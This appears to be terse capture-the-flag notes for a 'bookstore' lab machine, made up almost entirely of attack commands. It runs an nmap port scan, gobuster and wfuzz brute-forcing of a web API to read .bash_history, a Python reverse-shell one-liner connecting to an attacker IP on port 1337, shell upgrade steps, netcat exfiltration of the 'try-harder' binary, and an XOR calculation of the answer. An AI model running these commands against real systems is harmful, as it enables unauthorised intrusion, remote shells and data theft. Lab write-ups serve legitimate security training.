nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
gobuster dir -u http://$VICTIM:5000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
The console is locked by a PIN; we will have to come back to it.
wfuzz -c -f bookstore.txt -u "http://10.10.237.140:5000/api/v1/resources/books?FUZZ=.bash_history" -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc 404
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.43.15",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
nc -l -p 1234 > try-harder
nc -w 3 $KALI 1234 < try-harder
We work out how the magic number is computed.
python
1573724660 ^ 0x5db3 ^ 0x1116
./try-harder
Answer: 1573743953